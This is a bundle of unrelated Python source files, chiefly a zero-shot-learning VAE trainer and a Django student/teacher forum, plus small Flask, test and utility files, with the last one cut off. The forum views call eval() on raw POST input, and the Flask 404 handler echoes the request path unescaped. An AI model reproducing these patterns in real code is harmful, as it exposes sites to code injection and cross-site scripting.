f2 = 1.0 * (self.current_epoch - self.warmup['beta']['start_epoch']) / ( 1.0 * (self.warmup['beta']['end_epoch'] - self.warmup['beta']['start_epoch']))
f2 = f2 * (1.0 * self.warmup['beta']['factor'])
beta = torch.cuda.FloatTensor([min(max(f2, 0), self.warmup['beta']['factor'])])
f3 = 1.0*(self.current_epoch - self.warmup['distance']['start_epoch'] )/(1.0*( self.warmup['distance']['end_epoch']- self.warmup['distance']['start_epoch']))
f3 = f3*(1.0*self.warmup['distance']['factor'])
distance_factor = torch.cuda.FloatTensor([min(max(f3,0),self.warmup['distance']['factor'])])
##############################################
# Put the loss together and call the optimizer
##############################################
self.optimizer.zero_grad()
loss = reconstruction_loss - beta * KLD
if cross_reconstruction_loss>0:
loss += cross_reconstruction_factor*cross_reconstruction_loss
if distance_factor >0:
loss += distance_factor*distance
loss.backward()
self.optimizer.step()
return loss.item()
def train_vae(self):
losses = []
# self.dataloader = data.DataLoader(self.dataset,batch_size= self.batch_size,shuffle= True,drop_last=True)#,num_workers = 4)
self.dataset.novelclasses =self.dataset.novelclasses.long().cuda()
self.dataset.seenclasses =self.dataset.seenclasses.long().cuda()
#leave both statements
self.train()
self.reparameterize_with_noise = True
print('train for reconstruction')
for epoch in range(0, self.nepoch ):
self.current_epoch = epoch
i=-1
for iters in range(0, self.dataset.ntrain, self.batch_size):
i+=1
label, data_from_modalities = self.dataset.next_batch(self.batch_size)
label= label.long().to(self.device)
for j in range(len(data_from_modalities)):
data_from_modalities[j] = data_from_modalities[j].to(self.device)
data_from_modalities[j].requires_grad = False
loss = self.trainstep(data_from_modalities[0], data_from_modalities[1] )
if i%50==0:
print('epoch ' + str(epoch) + ' | iter ' + str(i) + '\t'+
' | loss ' + str(loss)[:5] )
if i%50==0 and i>0:
losses.append(loss)
# turn into evaluation mode:
for key, value in self.encoder.items():
self.encoder[key].eval()
for key, value in self.decoder.items():
self.decoder[key].eval()
return losses
def train_classifier(self, show_plots=False):
if self.num_shots > 0 :
print('================ transfer features from test to train ==================')
self.dataset.transfer_features(self.num_shots, num_queries='num_features')
history = [] # stores accuracies
cls_seenclasses = self.dataset.seenclasses
cls_novelclasses = self.dataset.novelclasses
train_seen_feat = self.dataset.data['train_seen']['resnet_features']
train_seen_label = self.dataset.data['train_seen']['labels']
novelclass_aux_data = self.dataset.novelclass_aux_data # access as novelclass_aux_data['resnet_features'], novelclass_aux_data['attributes']
seenclass_aux_data = self.dataset.seenclass_aux_data
novel_corresponding_labels = self.dataset.novelclasses.long().to(self.device)
seen_corresponding_labels = self.dataset.seenclasses.long().to(self.device)
# The resnet_features for testing the classifier are loaded here
novel_test_feat = self.dataset.data['test_unseen'][
'resnet_features'] # self.dataset.test_novel_feature.to(self.device)
seen_test_feat = self.dataset.data['test_seen'][
'resnet_features'] # self.dataset.test_seen_feature.to(self.device)
test_seen_label = self.dataset.data['test_seen']['labels'] # self.dataset.test_seen_label.to(self.device)
test_novel_label = self.dataset.data['test_unseen']['labels'] # self.dataset.test_novel_label.to(self.device)
train_unseen_feat = self.dataset.data['train_unseen']['resnet_features']
train_unseen_label = self.dataset.data['train_unseen']['labels']
# in ZSL mode:
if self.generalized == False:
# there are only 50 classes in ZSL (for CUB)
# novel_corresponding_labels =list of all novel classes (as tensor)
# test_novel_label = mapped to 0-49 in classifier function
# those are used as targets, they have to be mapped to 0-49 right here:
novel_corresponding_labels = self.map_label(novel_corresponding_labels, novel_corresponding_labels)
if self.num_shots > 0:
# not generalized and at least 1 shot means normal FSL setting (use only unseen classes)
train_unseen_label = self.map_label(train_unseen_label, cls_novelclasses)
# for FSL, we train_seen contains the unseen class examples
# for ZSL, train seen label is not used
# if self.num_shots>0:
# train_seen_label = self.map_label(train_seen_label,cls_novelclasses)
test_novel_label = self.map_label(test_novel_label, cls_novelclasses)
# map cls novelclasses last
cls_novelclasses = self.map_label(cls_novelclasses, cls_novelclasses)
if self.generalized:
print('mode: gzsl')
clf = LINEAR_LOGSOFTMAX(self.latent_size, self.num_classes)
else:
print('mode: zsl')
clf = LINEAR_LOGSOFTMAX(self.latent_size, self.num_novel_classes)
clf.apply(models.weights_init)
with torch.no_grad():
####################################
# preparing the test set
# convert raw test data into z vectors
####################################
self.reparameterize_with_noise = False
mu1, var1 = self.encoder['resnet_features'](novel_test_feat)
test_novel_X = self.reparameterize(mu1, var1).to(self.device).data
test_novel_Y = test_novel_label.to(self.device)
mu2, var2 = self.encoder['resnet_features'](seen_test_feat)
test_seen_X = self.reparameterize(mu2, var2).to(self.device).data
test_seen_Y = test_seen_label.to(self.device)
####################################
# preparing the train set:
# chose n random image features per
# class. If n exceeds the number of
# image features per class, duplicate
# some. Next, convert them to
# latent z features.
####################################
self.reparameterize_with_noise = True
def sample_train_data_on_sample_per_class_basis(features, label, sample_per_class):
sample_per_class = int(sample_per_class)
if sample_per_class != 0 and len(label) != 0:
classes = label.unique()
for i, s in enumerate(classes):
features_of_that_class = features[label == s, :] # order of features and labels must coincide
# if number of selected features is smaller than the number of features we want per class:
multiplier = torch.ceil(torch.cuda.FloatTensor(
[max(1, sample_per_class / features_of_that_class.size(0))])).long().item()
features_of_that_class = features_of_that_class.repeat(multiplier, 1)
if i == 0:
features_to_return = features_of_that_class[:sample_per_class, :]
labels_to_return = s.repeat(sample_per_class)
else:
features_to_return = torch.cat(
(features_to_return, features_of_that_class[:sample_per_class, :]), dim=0)
labels_to_return = torch.cat((labels_to_return, s.repeat(sample_per_class)),
dim=0)
return features_to_return, labels_to_return
else:
return torch.cuda.FloatTensor([]), torch.cuda.LongTensor([])
# some of the following might be empty tensors if the specified number of
# samples is zero :
img_seen_feat, img_seen_label = sample_train_data_on_sample_per_class_basis(
train_seen_feat,train_seen_label,self.img_seen_samples )
img_unseen_feat, img_unseen_label = sample_train_data_on_sample_per_class_basis(
train_unseen_feat, train_unseen_label, self.img_unseen_samples )
att_unseen_feat, att_unseen_label = sample_train_data_on_sample_per_class_basis(
novelclass_aux_data,
novel_corresponding_labels,self.att_unseen_samples )
att_seen_feat, att_seen_label = sample_train_data_on_sample_per_class_basis(
seenclass_aux_data,
seen_corresponding_labels, self.att_seen_samples)
def convert_datapoints_to_z(features, encoder):
if features.size(0) != 0:
mu_, logvar_ = encoder(features)
z = self.reparameterize(mu_, logvar_)
return z
else:
return torch.cuda.FloatTensor([])
z_seen_img = convert_datapoints_to_z(img_seen_feat, self.encoder['resnet_features'])
z_unseen_img = convert_datapoints_to_z(img_unseen_feat, self.encoder['resnet_features'])
z_seen_att = convert_datapoints_to_z(att_seen_feat, self.encoder[self.auxiliary_data_source])
z_unseen_att = convert_datapoints_to_z(att_unseen_feat, self.encoder[self.auxiliary_data_source])
train_Z = [z_seen_img, z_unseen_img ,z_seen_att ,z_unseen_att]
train_L = [img_seen_label , img_unseen_label,att_seen_label,att_unseen_label]
# empty tensors are sorted out
train_X = [train_Z[i] for i in range(len(train_Z)) if train_Z[i].size(0) != 0]
train_Y = [train_L[i] for i in range(len(train_L)) if train_Z[i].size(0) != 0]
train_X = torch.cat(train_X, dim=0)
train_Y = torch.cat(train_Y, dim=0)
############################################################
##### initializing the classifier and train one epoch
############################################################
cls = classifier.CLASSIFIER(clf, train_X, train_Y, test_seen_X, test_seen_Y, test_novel_X,
test_novel_Y,
cls_seenclasses, cls_novelclasses,
self.num_classes, self.device, self.lr_cls, 0.5, 1,
self.classifier_batch_size,
self.generalized)
for k in range(self.cls_train_epochs):
if k > 0:
if self.generalized:
cls.acc_seen, cls.acc_novel, cls.H = cls.fit()
else:
cls.acc = cls.fit_zsl()
if self.generalized:
print('[%.1f] novel=%.4f, seen=%.4f, h=%.4f , loss=%.4f' % (
k, cls.acc_novel, cls.acc_seen, cls.H, cls.average_loss))
history.append([torch.tensor(cls.acc_seen).item(), torch.tensor(cls.acc_novel).item(),
torch.tensor(cls.H).item()])
else:
print('[%.1f] acc=%.4f ' % (k, cls.acc))
history.append([0, torch.tensor(cls.acc).item(), 0])
if self.generalized:
return torch.tensor(cls.acc_seen).item(), torch.tensor(cls.acc_novel).item(), torch.tensor(
cls.H).item(), history
else:
return 0, torch.tensor(cls.acc).item(), 0, history
|
from docassemble.webapp.server import app as application
if __name__ == "__main__":
application.run(host='0.0.0.0')
|
from django.shortcuts import render, redirect, HttpResponse
from .models import Issue, Comment, UserProfile, TeacherProfile, Tags
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.template.defaultfilters import slugify
from random import randint
from datetime import datetime
from .spamfilter import plino
from django.core.mail import send_mail
messages = {
"404": {
"code": 404,
"status": "Page not found",
"message": "Oops! The page you are looking for does not exist. It might have been moved or deleted."
},
"403": {
"code": 403,
"status": "Forbidden",
"message": '"Tresspassers will be prosecuted." ~ Developers'
},
"500": {
"code": 500,
"status": "Server Error",
"message": "Houston! We have a problem! Please report to the site administrator."
},
}
# Create your views here.
##################################################### For index and error pages #####################################################
def index(request):
try:
if request.user.is_authenticated:
params = {'issues': Issue.objects.all()}
params["page_title"] = "Posted Issues"
return render(request, 'forum/index.html', params)
else:
return redirect('/forum/login')
except Exception as e:
return errorPage(request, messages["500"])
def errorPage(request, args=messages["404"], **kwargs):
try:
return render(request, 'forum/errorpage.html', args)
except Exception as e:
return errorPage(request, messages["500"])
##################################################### End index and error pages #####################################################
##################################################### For User authentication and related activities #####################################################
def signup(request):
try:
if request.user.is_authenticated:
return redirect('/forum/')
else:
return render(request, 'forum/signup.html')
except Exception as e:
return errorPage(request, messages["500"])
def loggedin(request):
try:
if request.user.is_authenticated:
return redirect('/forum/')
else:
return render(request, 'forum/login.html')
except Exception as e:
return errorPage(request, messages["500"])
def loginUser(request):
try:
if request.method == 'POST':
# return HttpResponse("<h1>This is the redirect page.<h1>")
loginuser = request.POST.get('loginuser')
loginpasswd = request.POST.get('loginpasswd')
user = authenticate(username=loginuser, password=loginpasswd)
if user is not None:
login(request, user)
return redirect('/forum/dashboard/')
else:
return HttpResponse("<h1>Credentials don't match.</h1>")
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
def logoutUser(request):
try:
# if request.method == 'POST':
logout(request)
# return HttpResponse("<h1>You've been successfully logged out.</h1>")
return redirect('/forum/')
except Exception as e:
return errorPage(request, messages["500"])
def newUser(request):
try:
if request.method == 'POST':
email = request.POST.get('email')
password = request.POST.get('passwd', None)
cpassword = request.POST.get('cpasswd', None)
username = email
role = request.POST.get('role', 'student')
image = request.FILES.get('profilepic')
print(f"\n\n\n\n{role}\n\n")
print(f"\n\n\n\n{User.objects.all()}\n\n")
try:
if cpassword == password:
myuser = User.objects.create_user(username, email, password)
print(f"\n\n\n\n{myuser.__dict__}\n\n")
# return HttpResponse("<h1>This is the redirect page.<h1>")
myuser.first_name = request.POST.get('fname')
myuser.last_name = request.POST.get('lname')
myuser.middle_name = request.POST.get('mname', None)
# myuser.roll = request.POST.get('rollno')
# myuser.reputation = 0
myuser.save()
myprofile = None
if role == 'student':
myprofile = UserProfile(reputation=0, rollno = request.POST.get('rollno'), user=myuser, username=username, profilepic=image)
elif role == 'teacher':
myprofile = TeacherProfile(reputation=0, rollno = request.POST.get('rollno'), user=myuser, username=username, tags=[{"tags": []}], profilepic=image)
print(f"\n\n\n\n{myprofile.__dict__}\n\n")
myprofile.save()
# authenticate(username=username, password=password)
# messages.success(request, "Your account has been successfully created!")
# return HttpResponse(f"<h1>Your account has been successfully created! Your username is: {myuser.username}. Save it somewhere.</h1>")
msg = {
"code": "Welcome!",
"status": "Congratulations! Your account has been created!",
"message": f"Your account has been successfully created! Your username is: {myuser.username}. Save it somewhere."
}
return errorPage(request, msg)
# return redirect('/forum/dashboard')
elif cpassword != password:
# return HttpResponse("<h1>Error - Passwords don't match.</h1>")
msg = {
"code": "Error",
"status": "Uh oh! Your passwords don't match :(",
"message": "Try signing up again, with matching passwords. No worries - we'll be waiting! :D"
}
return errorPage(request, msg)
elif User.objects.filter(username=username) is not None:
return redirect('/forum/login')
except Exception as e:
msg = {
"code": "Error",
"status": "Houston! We've got a problem! :(",
"message": f"Please Report the administration about the problem as soon as possible! Tell them the error: {e.message}"
}
return errorPage(request, msg)
# return HttpResponse(f"<h1>An Error Occured. Error details: {e}</h1>")
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
def passwordReset(request):
return HttpResponse("<h1>Password Reset</h1>")
# def sendMessage(message, args={}):
# def verifyCode(request, slug):
# num =
##################################################### End User authentication and related activities #####################################################
##################################################### For User Activities #####################################################
def blogPost(request, slug):
try:
issue = Issue.objects.filter(slug=slug)
comments = Comment.objects.filter(issue=issue.first())
if list(issue) == []:
# return HttpResponse("<h1>404 - Post not available!</h1>")
return errorPage(request, message["404"])
else:
params = dict(issue.values()[0])
print(f"\n\n\n{params}\n\n\n")
params["comments"] = comments
return render(request, 'forum/issue.html', params)
except Exception as e:
return errorPage(request, messages["404"])
def newPost(request):
try:
if not request.user.is_authenticated:
return redirect('/forum/login/')
else:
return render(request, 'forum/post.html')
except Exception as e:
return errorPage(request, messages["500"])
def uploadPost(request):
try:
if request.method == "POST":
user = request.user
subject = request.POST.get('subject')
summary = request.POST.get('summary')
description = request.POST.get('description')
# if plino(description):
# return HttpResponse("<h1>Really very very sorry fam,<br>your comment has been marked as spam.</h1>")
image = request.FILES.get('myfile')
is_anonymous = request.POST.get("anonymize", "off")
# print(image)
author = request.user.username if is_anonymous == "off" else "Anonymous"
slug = slugify(f"{subject.lower()}-{author.lower()}")
tags = TagsProcessor(request, "post", {"author": author, "slug": slug})
post = None
if image is not None:
post = Issue(user=user, subject=subject, summary=summary, description=description, image=image, author=author, slug=slug, tags=tags)
else:
post = Issue(user=user, subject=subject, summary=summary, description=description, author=author, slug=slug, tags=tags)
post.save()
return redirect('/forum/')
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
def userProfile(request, slug):
try:
user = User.objects.filter(username=slug)
user_issues = Issue.objects.filter(author=slug)
params = dict(user.values()[0])
params["user_issues"] = list(user_issues.values())
params["comments"] = list(Comment.objects.filter(username=slug).values())
profileType = None
profilepic = ''
if UserProfile.objects.filter(username=slug).exists():
profileType = "Student"
profilepic = UserProfile.objects.filter(username=slug).first().profilepic
elif TeacherProfile.objects.filter(username=slug).exists():
profileType = "Faculty"
profilepic = TeacherProfile.objects.filter(username=slug).first().profilepic
else:
profileType = "Unknown"
params["profileType"] = profileType
params["profilepic"] = profilepic
if list(user) == []:
msg = {
"code": 404,
"status": "Username not found :(",
"message": f"The username {slug} you've been searching for is not available in our data. :( Maybe the user deleted their account, or is Anonymous?"
}
return errorPage(request, msg)
# return HttpResponse("<h1>Username not found!</h1>")
elif request.user.username == slug:
return redirect('/forum/dashboard/')
else:
return render(request, 'forum/user.html', params)
except IndexError:
# return HttpResponse("<h1>Username not found!</h1>")
msg = {
"code": 404,
"status": "Username not found :(",
"message": f"The username {slug} you've been searching for is not available in our data. :( Maybe the user deleted their account, or is Anonymous?"
}
return errorPage(request, msg)
except Exception as e:
return errorPage(request, messages["500"])
def dashboard(request):
try:
if request.user.is_authenticated:
activity = list(Issue.objects.filter(user=request.user))
data = User.objects.filter(username = request.user.username)
profile = UserProfile.objects.filter(username = request.user.username).first()
if request.user.is_superuser:
return redirect("/admin/")
isTeacher = False
if(profile == None):
profile = TeacherProfile.objects.filter(username = request.user.username).first()
isTeacher = True
params = dict(data.values()[0])
params["activity"] = activity
params["rollno"] = profile.__dict__["rollno"] if not request.user.is_superuser else "NA"
params["reputation"] = profile.__dict__["reputation"] if not request.user.is_superuser else "Inf"
params["profilepic"] = profile.__dict__["profilepic"] if not request.user.is_superuser else ''
if isTeacher:
params["tags"] = profile.__dict__["tags"]
comments_activity = list(Comment.objects.filter(username=request.user.username))
params["comments"] = comments_activity
# print(params)
# return HttpResponse(f"<h1>This will be the Dashboard for {request.user.username}</h1>")
if isTeacher:
a = list(Tags.objects.all())
username = request.user.username
ls = []
for i in a:
if username in i.usernames:
ls.append(i)
params["notifications"] = ls
myprof = TeacherProfile.objects.filter(username=username).first()
ls2 = [x.label for x in ls]
if myprof is not None:
myprof.tags = ls2
myprof.save()
print(f"\n\n\n{ls}\n\n\n")
if isTeacher:
return render(request, 'forum/staff/dashboard.html', params)
else:
return render(request, 'forum/student/dashboard.html', params)
else:
return redirect('/forum/login')
except Exception as e:
return errorPage(request, messages["500"])
def postComment(request):
try:
if request.method == 'POST':
comment = request.POST.get("comment")
user = request.user
postId = request.POST.get("postId")
# print("\n\n\n\n" + postId + str(type(postId)) + "\n\n\n")
slug = request.POST.get("postSlug")
issues = Issue.objects.filter(sno=postId).first()
username = request.user.username
tags = TagsProcessor(request, "comment", {"author": username, "slug": slug})
# comment_slug = issue_slug + '-' + datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
if not plino(comment):
obj = Comment(description=comment, issue=issues, user=user, username=username, slug=slug, tags=tags)
obj.save()
return redirect(f'/forum/post/{slug}')
else:
msg = {
"code": "Spam",
"status": "Spam detected",
"message": "Really very very sorry fam,<br>your comment has been marked as spam."
}
return errorPage(request, msg)
else:
# return HttpResponse("<h1>HTTP 403 - Forbidden</h1>")
return errorPage(request)
except Exception as e:
return errorPage(request, messages["500"])
def deletePost(request, slug):
try:
if request.method == "POST":
postId = request.POST.get("postId")
author = request.POST.get("poster")
postSlug = None
a = None
if slug == "issue":
a = Issue.objects.filter(sno=postId).first()
print(f"\n\nPost: \n\n{a}\n\n")
elif slug == "comment":
a = Comment.objects.filter(sno=postId).first()
print(f"\n\nComment: \n\n{a}\n\n")
postSlug = str(a.slug)
print(f"\n\n{request.user.username}")
print(f"\n\n{author}")
if request.user.username == author or request.user.is_superuser:
a.delete()
if slug == "issue":
return redirect("/forum/")
elif slug == "comment":
return redirect(f"/forum/post/{postSlug}")
else:
msg = dict(messages["403"])
msg["message"] = "Hippity hoppity floppity, the post isn't your property :P"
return errorPage(request, msg)
# return HttpResponse("<h1>Hippity hoppity floppity, the post isn't your property :P")
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
##################################################### End User Activities #####################################################
##################################################### For voting #####################################################
def voteUp(request):
if request.user.is_authenticated:
if request.method == 'POST':
postId = request.POST.get("postId")
author = request.POST.get("poster")
issues = Issue.objects.filter(sno=postId).first()
user = User.objects.filter(username=author).first()
userprofile = None # list(set([TeacherProfile.objects.filter(username=author).first(), UserProfile.objects.filter(username=author).first()]))[0] # if not (user.is_superuser or user.is_staff) else None
if TeacherProfile.objects.filter(username=author).first() is not None:
userprofile = TeacherProfile.objects.filter(username=author).first()
else:
userprofile = UserProfile.objects.filter(username=author).first()
# print("UserProfile:", userprofile.__dict__)
# print("\n\nUser:", user.__dict__)
slug = issues.slug
# if num in [-1, 1] and list(issues) != []:
issues.votes += 1
if user is not None and author != "Anonymous" and user.is_superuser == False and user.is_staff == False:
userprofile.reputation -= 1
userprofile.save()
issues.votes -= 1
issues.save()
user.save()
else:
return errorPage(request, messages["403"])
return redirect(f'/forum/post/{slug}')
else:
return redirect('/forum/login/')
def voteDown(request):
if request.user.is_authenticated:
if request.method == 'POST':
postId = request.POST.get("postId")
author = request.POST.get("poster")
issues = Issue.objects.filter(sno=postId).first()
user = User.objects.filter(username=author).first()
# print(f"\n\n{user}\n\n")
userprofile = None # list(set([TeacherProfile.objects.filter(username=author).first(), UserProfile.objects.filter(username=author).first()]))[0] # if not (user.is_superuser or user.is_staff) else None
if TeacherProfile.objects.filter(username=author).first() is not None:
userprofile = TeacherProfile.objects.filter(username=author).first()
else:
userprofile = UserProfile.objects.filter(username=author).first()
# print(f"\n\n{userprofile}\n\n")
# print("UserProfile:", userprofile.__dict__)
# print("\n\nUser:", user.__dict__)
slug = issues.slug
# if num in [-1, 1] and list(issues) != []:
if user is not None and author != "Anonymous" and user.is_superuser == False and user.is_staff == False:
userprofile.reputation -= 1
userprofile.save()
issues.votes -= 1
issues.save()
user.save()
else:
return errorPage(request, messages["403"])
return redirect(f'/forum/post/{slug}')
else:
return redirect('/forum/login/')
def tvoteUp(request):
if request.user.is_authenticated:
if request.method == 'POST':
# postId = request.POST.get("postId")
tags = eval(request.POST.get("postTags"))
print(f"\n\n\n{tags}\t{type(tags)}\n\n\n")
# issues = Issue.objects.filter(id=postId).first()
# user = User.objects.filter(username=author).first()
usernames_list = []
# teachers_list = []
for tagname in tags:
print(f"\n{tagname}\n")
usernames_list += Tags.objects.filter(label=tagname).first().usernames
usernames_list = list(set(usernames_list))
print(f"\n{usernames_list}\n")
for i in usernames_list:
print(f"\n{i}\n")
teacheruser = TeacherProfile.objects.filter(username=i).first()
print(f"\n{teacheruser}\n")
if teacheruser is not None:
teacheruser.reputation += 1
teacheruser.save()
# return HttpResponse("Don't you think the authorities are awesome? :D")
msg = {
"code": ":)",
"status": "Kudos to the authorities!",
"message": "Your upvote has been successfully recorded. Don't you think the authorities are awesome? :D",
}
return errorPage(request, msg)
else:
msg = dict(messages["403"])
msg["message"] = '"There are no shortcuts to votes :)" ~ Developers'
return errorPage(request, msg)
else:
return redirect('/forum/login')
def tvoteDown(request):
if request.user.is_authenticated:
if request.method == 'POST':
# postId = request.POST.get("postId")
tags = eval(request.POST.get("postTags"))
print(f"\n\n\n{tags}\t{type(tags)}\n\n\n")
# issues = Issue.objects.filter(id=postId).first()
# user = User.objects.filter(username=author).first()
usernames_list = []
# teachers_list = []
for tagname in tags:
print(f"\n{tagname}\n")
usernames_list += Tags.objects.filter(label=tagname).first().usernames
usernames_list = list(set(usernames_list))
print(f"\n{usernames_list}\n")
for i in usernames_list:
print(f"\n{i}\n")
teacheruser = TeacherProfile.objects.filter(username=i).first()
print(f"\n{teacheruser}\n")
if teacheruser is not None:
teacheruser.reputation -= 1
teacheruser.save()
msg = {
"code": ":(",
"status": "So sorry to know that...",
"message": "Your downvote has been successfully recorded. Maybe they'll look into it now?",
}
return errorPage(request, msg)
# return HttpResponse("So sorry to know that :(... Maybe they'll look into it now?")
else:
# return HttpResponse('"There are no shortcuts to votes :)" ~ Developers')
msg = dict(messages["403"])
msg["message"] = '"There are no shortcuts to votes :)" ~ Developers'
return errorPage(request, msg)
else:
return redirect('/forum/login')
##################################################### End voting #####################################################
##################################################### For search and leaderboards #####################################################
def search(request):
issues = list(Issue.objects.all())
query = request.POST.get('search')
results_list = []
init = datetime.now()
for i in issues:
idict = i.__dict__
for j in idict.keys():
if j != '_state':
if isinstance(idict[j],str):
if query.lower() in idict[j].lower():
results_list.append(i)
results_list = list(set(results_list))
params = {'issues': results_list}
params["page_title"] = f"Showing {len(results_list)} search results for '{query}' in {(datetime.now() - init).total_seconds()} seconds"
return render(request, 'forum/index.html', params)
def StudentLeaderBoard(request):
users = list(UserProfile.objects.all())
users.sort(key = lambda x: x.reputation, reverse=True)
params = {}
params["page_title"] = "Student Leaderboard"
params["users"] = users
return render(request, 'forum/student/leaderboard.html', params)
def TeacherLeaderBoard(request):
users = list(TeacherProfile.objects.all())
users.sort(key = lambda x: x.reputation, reverse=True)
params = {}
params["page_title"] = "Staff Leaderboard"
params["users"] = users
return render(request, 'forum/staff/leaderboard.html', params)
##################################################### End search and leaderboards #####################################################
##################################################### For tags #####################################################
def TagsProcessor(request, mode, args):
text = request.POST.get("tags")
taglist = list(set([slugify(x.strip(" ").strip(" ").lower()) for x in text.strip(" ").strip(" ").split(",")]))
tags_all = [x.label for x in Tags.objects.all()]
username = request.user.username
if mode == "post":
for i in taglist:
if i not in tags_all:
newtag = Tags(label=i, usernames=[], issues=[], comments=[])
newtag.save()
i = taglist[0]
for i in taglist:
a = Tags.objects.filter(label=i).first()
a.issues.append(args["slug"])
a.usernames.append(args["author"])
a.usernames = list(set(a.usernames))
a.issues = list(set(a.issues))
a.save()
elif mode == "comment":
for i in taglist:
if i not in tags_all:
newtag = Tags(label=i, usernames=[], issues=[], comments=[])
newtag.save()
i = taglist[0]
for i in taglist:
a = Tags.objects.filter(label=i).first()
a.comments.append(args["slug"])
a.usernames.append(args["author"])
a.usernames = list(set(a.usernames))
a.comments = list(set(a.comments))
a.save()
return taglist
def showTag(request, slug):
tags = Tags.objects.filter(label=slug).first()
if tags is not None:
# return HttpResponse(f"<h1>This is the tag page of {slug}</h1>")
return render(request, 'forum/tag.html', tags.__dict__)
else:
msg = dict(messages["404"])
msg["status"] = "That's the wrong way."
msg["message"] = f"Tag '{slug}' doesn't exist. It may have been deleted, or might have never existed."
return errorPage(request, msg)
##################################################### End tags #####################################################
|
# coding=utf-8
# Copyright 2019 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for SNAIL."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import range
from tensor2robot.layers import snail
import tensorflow.compat.v1 as tf
class SNAILTest(tf.test.TestCase):
def test_CausalConv(self):
x = tf.random.normal((4, 10, 8))
y = snail.CausalConv(x, 1, 5)
self.assertEqual(y.shape, (4, 10, 5))
def test_DenseBlock(self):
x = tf.random.normal((4, 10, 8))
y = snail.DenseBlock(x, 1, 5)
self.assertEqual(y.shape, (4, 10, 13))
def test_TCBlock(self):
sequence_length = 10
x = tf.random.normal((4, sequence_length, 8))
y = snail.TCBlock(x, sequence_length, 5)
self.assertEqual(y.shape, (4, 10, 8 + 4*5))
def test_CausallyMaskedSoftmax(self):
num_rows = 5
x = tf.random.normal((num_rows, 3))
logits = tf.matmul(x, tf.linalg.transpose(x))
y = snail.CausallyMaskedSoftmax(logits)
with self.test_session() as sess:
y_ = sess.run(y)
idx = np.triu_indices(num_rows, 1)
np.testing.assert_array_equal(y_[idx], 0.)
# Testing that each row sums to 1.
for i in range(num_rows):
np.testing.assert_almost_equal(np.sum(y_[i, :]), 1.0)
def test_AttentionBlock(self):
x = tf.random.normal((4, 10, 8))
y, end_points = snail.AttentionBlock(x, 3, 5)
self.assertEqual(y.shape, (4, 10, 5+8))
self.assertEqual(end_points['attn_prob'].shape, (4, 10, 10))
if __name__ == '__main__':
tf.test.main()
|
from django.urls import path
from contacts.views import Home
urlpatterns = [
path('', Home.as_view()),
]
|
from flask import Flask, request
app = Flask(__name__)
@app.route("/")
def index():
return "Hello, world!"
@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
|
import simuvex
######################################
# listen (but not really)
######################################
import logging
l = logging.getLogger("simuvex.procedures.libc.listen")
class listen(simuvex.SimProcedure):
#pylint:disable=arguments-differ
def run(self, sockfd, backlog): #pylint:disable=unused-argument
return self.state.se.Unconstrained('listen', self.state.arch.bits)
|
from table import String, Term, Concept
from connection import Connection
from collections import defaultdict
from itertools import chain
class Aggregator(object):
"""Example class of Aggregate queries using different UMLS tables"""
def __init__(self, dbname="umls", hostname="localhost", port=27017):
"""
Initialize an aggregator of different tables.
:param dbname: the name of the DB, default is UMLS
:param hostname: the name of the host, default is localhost
:param port: the port on which your mongodb runs, default is 27107
:return: None
"""
self._connection = Connection(dbname, hostname, port)
self.string = String(self._connection)
self.term = Term(self._connection)
self.concept = Concept(self._connection)
def concepts_string(self, string):
"""
Get all concept objects given a string.
:param string: the string for which to search concepts
:return: a list of concepts.
"""
concepts = self.string.concept_id(string)
if not concepts:
return []
return list(self.concept.bunch(concepts))
def definitions(self, string):
"""
Get all definitions given a string.
:param string: the string for which to search definitions.
:return: a dictionary of concepts which contains the definition of that concept.
"""
string_obj = self.string.retrieve_one({"string": string}, {"_id": 1, "concept": 1})
if not string_obj:
return []
return self.concept.bunch_definitions(string_obj["concept"])
def definitions_terms(self, string):
"""
Get all definitions + preferred terms for a given string. Useful for creating concept representations.
:param string: the string for which to retrieve the concepts and preferred terms.
:return: a dictionary of concepts with the strings that refer to that concept.
"""
cids = self.string.concept_id(string)
return self.definitions_terms_cid(cids)
def definitions_terms_cid(self, cids, include_synonyms=(), include_term=True):
"""
Get all definitions from a cid.
:param cids: a list of cids
:param include_synonyms: The types of synonyms to include.
:param include_term: whether to use the preferred term.
:return: A list of definitions, grouped by concept.
"""
concepts = self.concept.bunch(cids, filt={"_id": 1, "definition": 1, "preferred": 1, "rel": 1})
output = defaultdict(set)
for c in concepts:
try:
output[c["_id"]].update(c["definition"])
except KeyError:
pass
if include_synonyms:
for syn in include_synonyms:
try:
synonyms = self.definitions_terms_cid(c["rel"][syn], include_term=include_term, include_synonyms=()).values()
output[c["_id"]].update(chain.from_iterable(synonyms))
except KeyError:
pass
if include_term:
term = self.term[c["preferred"]]
output[c["_id"]].update(self.string.surface(term["string"]))
output[c["_id"]] = list(output[c["_id"]])
return output
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the plist plugin interface."""
import unittest
from dfdatetime import posix_time as dfdatetime_posix_time
from plaso.containers import plist_event
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers.plist_plugins import interface
from tests.parsers.plist_plugins import test_lib
class MockPlugin(interface.PlistPlugin):
"""Mock plugin."""
NAME = 'mock_plist_plugin'
DATA_FORMAT = 'Test plist file'
PLIST_PATH = 'plist_binary'
PLIST_KEYS = frozenset(['DeviceCache', 'PairedDevices'])
# pylint: disable=arguments-differ
def GetEntries(self, parser_mediator, **unused_kwargs):
"""Extracts entries for testing.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
"""
event_data = plist_event.PlistTimeEventData()
event_data.key = 'LastInquiryUpdate'
